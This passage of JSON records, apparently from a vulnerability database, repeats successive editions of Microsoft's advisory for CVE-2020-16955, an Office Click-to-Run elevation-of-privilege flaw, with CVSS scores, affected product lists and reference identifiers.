"1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:52:55", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-28T10:43:01", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T10:43:01", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-29T08:51:02", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:02", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-29T10:44:59", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-26T08:45:55", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-26T08:45:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:44:59", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-30T06:47:14", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-30T06:47:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-30T06:47:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:47:14", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-30T20:46:49", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-30T06:47:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-30T06:47:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:46:49", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-01T06:44:36", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-30T06:47:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-30T06:47:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:36", "differentElements": ["msAffectedSoftware"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-01T09:07:11", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-30T06:47:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-30T06:47:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:07:11", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-10-01T12:45:24", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": 